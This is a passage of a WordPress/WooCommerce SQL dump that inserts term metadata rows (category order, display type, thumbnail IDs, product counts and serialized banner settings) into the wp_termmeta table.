INSERT INTO `wp_termmeta` VALUES (434, 142, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (435, 142, 'thumbnail_id', '1966'); 
INSERT INTO `wp_termmeta` VALUES (436, 142, 'product_count_product_cat', '3'); 
INSERT INTO `wp_termmeta` VALUES (437, 143, 'order', '34'); 
INSERT INTO `wp_termmeta` VALUES (438, 143, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (439, 143, 'thumbnail_id', '1926'); 
INSERT INTO `wp_termmeta` VALUES (440, 144, 'order', '52'); 
INSERT INTO `wp_termmeta` VALUES (441, 144, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (442, 144, 'thumbnail_id', '917'); 
INSERT INTO `wp_termmeta` VALUES (443, 144, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (444, 144, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (445, 145, 'order', '50'); 
INSERT INTO `wp_termmeta` VALUES (446, 145, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (447, 145, 'thumbnail_id', '1960'); 
INSERT INTO `wp_termmeta` VALUES (448, 145, 'product_count_product_cat', '4'); 
INSERT INTO `wp_termmeta` VALUES (449, 145, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (450, 143, 'product_count_product_cat', '0'); 
INSERT INTO `wp_termmeta` VALUES (451, 146, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (452, 147, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (453, 148, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (454, 143, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (455, 149, 'order', '1'); 
INSERT INTO `wp_termmeta` VALUES (456, 149, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (457, 149, 'thumbnail_id', '1913'); 
INSERT INTO `wp_termmeta` VALUES (458, 149, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1223";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (459, 150, 'order', '40'); 
INSERT INTO `wp_termmeta` VALUES (460, 150, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (461, 150, 'thumbnail_id', '1142'); 
INSERT INTO `wp_termmeta` VALUES (462, 151, 'order', '35'); 
INSERT INTO `wp_termmeta` VALUES (463, 151, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (464, 151, 'thumbnail_id', '1141'); 
INSERT INTO `wp_termmeta` VALUES (465, 150, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (466, 149, 'product_count_product_cat', '140'); 
INSERT INTO `wp_termmeta` VALUES (467, 152, 'order', '49'); 
INSERT INTO `wp_termmeta` VALUES (468, 152, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (469, 152, 'thumbnail_id', '1959'); 
INSERT INTO `wp_termmeta` VALUES (470, 152, 'product_count_product_cat', '3'); 
INSERT INTO `wp_termmeta` VALUES (471, 39, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (472, 153, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (473, 154, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (474, 155, 'order', '43'); 
INSERT INTO `wp_termmeta` VALUES (475, 155, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (476, 155, 'thumbnail_id', '1947'); 
INSERT INTO `wp_termmeta` VALUES (477, 155, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (478, 156, 'order', '16'); 
INSERT INTO `wp_termmeta` VALUES (479, 156, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (480, 156, 'thumbnail_id', '1932'); 
INSERT INTO `wp_termmeta` VALUES (481, 156, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (482, 157, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (483, 158, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (484, 159, 'order', '48'); 
INSERT INTO `wp_termmeta` VALUES (485, 159, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (486, 159, 'thumbnail_id', '964'); 
INSERT INTO `wp_termmeta` VALUES (487, 159, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (488, 160, 'order', '33'); 
INSERT INTO `wp_termmeta` VALUES (489, 160, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (490, 160, 'thumbnail_id', '1930'); 
INSERT INTO `wp_termmeta` VALUES (491, 160, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (492, 161, 'order', '46'); 
INSERT INTO `wp_termmeta` VALUES (493, 161, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (494, 161, 'thumbnail_id', '1956'); 
INSERT INTO `wp_termmeta` VALUES (495, 161, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (496, 160, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (497, 162, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (498, 163, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (499, 164, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (500, 155, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (501, 165, 'order', '28'); 
INSERT INTO `wp_termmeta` VALUES (502, 165, 'display_type', 'products'); 
INSERT INTO `wp_termmeta` VALUES (503, 165, 'thumbnail_id', '1044'); 
INSERT INTO `wp_termmeta` VALUES (504, 165, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (505, 166, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (506, 167, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (507, 168, 'order', '30'); 
INSERT INTO `wp_termmeta` VALUES (508, 168, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (509, 168, 'thumbnail_id', '1038'); 
INSERT INTO `wp_termmeta` VALUES (510, 169, 'order', '32'); 
INSERT INTO `wp_termmeta` VALUES (511, 169, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (512, 169, 'thumbnail_id', '1039'); 
INSERT INTO `wp_termmeta` VALUES (513, 170, 'order', '31'); 
INSERT INTO `wp_termmeta` VALUES (514, 170, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (515, 170, 'thumbnail_id', '1023'); 
INSERT INTO `wp_termmeta` VALUES (516, 171, 'order', '9'); 
INSERT INTO `wp_termmeta` VALUES (517, 171, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (518, 171, 'thumbnail_id', '1948'); 
INSERT INTO `wp_termmeta` VALUES (519, 169, 'product_count_product_cat', '8'); 
INSERT INTO `wp_termmeta` VALUES (520, 168, 'product_count_product_cat', '16'); 
INSERT INTO `wp_termmeta` VALUES (521, 172, 'product_count_product_tag', '16'); 
INSERT INTO `wp_termmeta` VALUES (522, 173, 'product_count_product_tag', '16'); 
INSERT INTO `wp_termmeta` VALUES (523, 168, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (524, 170, 'product_count_product_cat', '8'); 
INSERT INTO `wp_termmeta` VALUES (525, 170, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (526, 174, 'order', '47'); 
INSERT INTO `wp_termmeta` VALUES (527, 174, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (528, 174, 'thumbnail_id', '1957'); 
INSERT INTO `wp_termmeta` VALUES (529, 174, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (530, 174, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (531, 169, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (532, 128, 'product_count_product_cat', '4'); 
INSERT INTO `wp_termmeta` VALUES (533, 165, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (534, 175, 'order', '56'); 
INSERT INTO `wp_termmeta` VALUES (535, 175, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (536, 175, 'thumbnail_id', '1046'); 
INSERT INTO `wp_termmeta` VALUES (537, 176, 'order', '57'); 
INSERT INTO `wp_termmeta` VALUES (538, 176, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (539, 176, 'thumbnail_id', '1053'); 
INSERT INTO `wp_termmeta` VALUES (540, 177, 'order', '58'); 
INSERT INTO `wp_termmeta` VALUES (541, 177, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (542, 177, 'thumbnail_id', '1054'); 
INSERT INTO `wp_termmeta` VALUES (543, 178, 'order', '59'); 
INSERT INTO `wp_termmeta` VALUES (544, 178, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (545, 178, 'thumbnail_id', '1055'); 
INSERT INTO `wp_termmeta` VALUES (546, 179, 'order', '60'); 
INSERT INTO `wp_termmeta` VALUES (547, 179, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (548, 179, 'thumbnail_id', '1058'); 
INSERT INTO `wp_termmeta` VALUES (549, 179, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (550, 127, 'product_count_product_cat', '21'); 
INSERT INTO `wp_termmeta` VALUES (551, 178, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (552, 177, 'product_count_product_cat', '10'); 
INSERT INTO `wp_termmeta` VALUES (553, 176, 'product_count_product_cat', '5'); 
INSERT INTO `wp_termmeta` VALUES (554, 175, 'product_count_product_cat', '4'); 
INSERT INTO `wp_termmeta` VALUES (555, 129, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (556, 180, 'order', '64'); 
INSERT INTO `wp_termmeta` VALUES (557, 180, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (558, 180, 'thumbnail_id', '1070'); 
INSERT INTO `wp_termmeta` VALUES (559, 181, 'order', '65'); 
INSERT INTO `wp_termmeta` VALUES (560, 181, 'display_type', 'products'); 
INSERT INTO `wp_termmeta` VALUES (561, 181, 'thumbnail_id', '1071'); 
INSERT INTO `wp_termmeta` VALUES (562, 129, 'product_count_product_cat', '8'); 
INSERT INTO `wp_termmeta` VALUES (563, 180, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (564, 182, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (565, 183, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (566, 184, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (567, 185, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (568, 186, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (569, 187, 'product_count_product_tag', '13'); 
INSERT INTO `wp_termmeta` VALUES (570, 188, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (571, 189, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (572, 171, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (573, 171, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (574, 150, 'product_count_product_cat', '6'); 
INSERT INTO `wp_termmeta` VALUES (575, 190, 'product_count_product_tag', '9'); 
INSERT INTO `wp_termmeta` VALUES (576, 191, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (577, 151, 'product_count_product_cat', '19'); 
INSERT INTO `wp_termmeta` VALUES (578, 192, 'product_count_product_tag', '13'); 
INSERT INTO `wp_termmeta` VALUES (579, 193, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (580, 194, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (581, 195, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (582, 196, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (583, 197, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (584, 151, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (585, 198, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (586, 227, 'order', '42'); 
INSERT INTO `wp_termmeta` VALUES (587, 227, 'display_type', 'products'); 
INSERT INTO `wp_termmeta` VALUES (588, 227, 'thumbnail_id', '1148'); 
INSERT INTO `wp_termmeta` VALUES (589, 227, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (590, 227, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (591, 228, 'order', '66'); 
INSERT INTO `wp_termmeta` VALUES (592, 228, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (593, 228, 'thumbnail_id', '1151'); 
INSERT INTO `wp_termmeta` VALUES (594, 228, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (595, 156, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1179";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (596, 180, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (597, 181, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (598, 181, 'product_count_product_cat', '1'); 
INSERT INTO `wp_termmeta` VALUES (599, 229, 'order', '63'); 
INSERT INTO `wp_termmeta` VALUES (600, 229, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (601, 229, 'thumbnail_id', '1220'); 
INSERT INTO `wp_termmeta` VALUES (602, 229, 'image', '1220'); 
INSERT INTO `wp_termmeta` VALUES (603, 229, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (604, 229, 'product_count_product_cat', '3'); 
INSERT INTO `wp_termmeta` VALUES (605, 230, 'order', '62'); 
INSERT INTO `wp_termmeta` VALUES (606, 230, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (607, 230, 'thumbnail_id', '1229'); 
INSERT INTO `wp_termmeta` VALUES (608, 230, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (609, 10, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:4:"1238";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (615, 231, 'order', '84'); 
INSERT INTO `wp_termmeta` VALUES (616, 231, 'display_type', ''); 
INSERT INTO `wp_termmeta` VALUES (617, 231, 'thumbnail_id', '1290'); 
INSERT INTO `wp_termmeta` VALUES (618, 232, 'order', '85'); 
INSERT INTO `wp_termmeta` VALUES (619, 232, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (620, 232, 'thumbnail_id', '1285'); 
INSERT INTO `wp_termmeta` VALUES (621, 232, 'product_count_product_cat', '6'); 
INSERT INTO `wp_termmeta` VALUES (622, 233, 'product_count_product_tag', '5'); 
INSERT INTO `wp_termmeta` VALUES (623, 234, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (624, 235, 'product_count_product_tag', '9'); 
INSERT INTO `wp_termmeta` VALUES (625, 236, 'product_count_product_tag', '6'); 
INSERT INTO `wp_termmeta` VALUES (626, 237, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (627, 238, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (628, 239, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (629, 232, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (630, 231, 'product_count_product_cat', '2'); 
INSERT INTO `wp_termmeta` VALUES (631, 240, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (632, 241, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (633, 242, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (634, 231, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (636, 243, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (637, 244, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (638, 245, 'product_count_product_tag', '6'); 
INSERT INTO `wp_termmeta` VALUES (643, 247, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (644, 248, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (645, 249, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (646, 250, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (648, 251, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (649, 252, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (650, 253, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (651, 254, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (652, 255, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (653, 256, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (654, 257, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (655, 258, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (656, 260, 'order', '39'); 
INSERT INTO `wp_termmeta` VALUES (657, 260, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (658, 260, 'thumbnail_id', '1661'); 
INSERT INTO `wp_termmeta` VALUES (659, 261, 'order', '38'); 
INSERT INTO `wp_termmeta` VALUES (660, 261, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (661, 261, 'thumbnail_id', '1660'); 
INSERT INTO `wp_termmeta` VALUES (662, 262, 'order', '37'); 
INSERT INTO `wp_termmeta` VALUES (663, 262, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (664, 262, 'thumbnail_id', '1672'); 
INSERT INTO `wp_termmeta` VALUES (665, 261, 'product_count_product_cat', '10'); 
INSERT INTO `wp_termmeta` VALUES (666, 263, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (667, 264, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (668, 265, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (669, 266, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (670, 267, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (671, 268, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (672, 269, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (673, 270, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (674, 271, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (675, 272, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (676, 273, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (677, 274, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (678, 275, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (679, 276, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (680, 277, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (681, 278, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (682, 279, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (683, 280, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (684, 281, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (685, 282, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (686, 283, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (687, 284, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (688, 285, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (689, 286, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (690, 287, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (691, 288, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (692, 289, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (693, 290, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (694, 291, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (695, 292, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (696, 293, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (697, 294, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (698, 295, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (699, 296, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (700, 297, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (701, 298, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (702, 299, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (703, 300, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (704, 301, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (705, 302, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (706, 303, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (707, 304, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (708, 305, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (709, 306, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (710, 307, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (711, 308, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (712, 309, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (713, 310, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (714, 311, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (715, 312, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (716, 313, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (717, 314, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (718, 315, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (719, 316, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (720, 261, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (721, 260, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (722, 260, 'product_count_product_cat', '3'); 
INSERT INTO `wp_termmeta` VALUES (723, 317, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (724, 318, 'product_count_product_tag', '7'); 
INSERT INTO `wp_termmeta` VALUES (725, 319, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (726, 262, 'product_count_product_cat', '6'); 
INSERT INTO `wp_termmeta` VALUES (727, 320, 'product_count_product_tag', '2'); 
INSERT INTO `wp_termmeta` VALUES (728, 321, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (729, 322, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (730, 262, 'cat_meta', 'a:5:{s:13:"banner_url_id";s:0:"";s:11:"banner_link";s:0:"";s:19:"auto_display_banner";s:2:"on";s:10:"cat_header";s:0:"";s:10:"cat_footer";s:0:"";}'); 
INSERT INTO `wp_termmeta` VALUES (731, 323, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (732, 324, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (733, 325, 'order', '36'); 
INSERT INTO `wp_termmeta` VALUES (734, 325, 'display_type', 'subcategories'); 
INSERT INTO `wp_termmeta` VALUES (735, 325, 'thumbnail_id', '1676'); 
INSERT INTO `wp_termmeta` VALUES (736, 325, 'product_count_product_cat', '4'); 
INSERT INTO `wp_termmeta` VALUES (737, 326, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (738, 327, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (739, 328, 'product_count_product_tag', '3'); 
INSERT INTO `wp_termmeta` VALUES (740, 329, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (741, 330, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (742, 331, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (743, 332, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (744, 333, 'product_count_product_tag', '1'); 
INSERT INTO `wp_termmeta` VALUES (745, 334, 'product_count_product_tag', '1'); 
